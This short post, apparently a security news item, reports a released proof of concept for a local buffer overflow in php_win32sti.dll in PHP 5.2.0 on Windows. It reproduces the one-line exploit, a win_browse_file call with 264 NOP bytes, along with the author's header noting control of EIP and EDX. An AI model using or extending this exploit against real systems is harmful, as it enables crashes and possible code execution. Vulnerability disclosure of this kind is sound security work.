PHP
A PoC has been released for a vulnerability that causes a local buffer overflow in the Windows build of PHP 5.2.0. It is just one line...
win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );
// ==================================================================================
//
// php_win32sti.dll PHP <= 5.2.0 (win32) Buffer Overflow
//
// [x] Discovery: boecke <boecke@herzeleid.net>
// [x] Risk: Local Buffer Overflow (Medium - High Risk)
// [x] Notes: EDX and EIP are able to be controlled and therefore
//            have the potential to dictate program flow.
//
// [x] "Sangre, sonando, de rabia naci.. Who do you trust?"
//
// ==================================================================================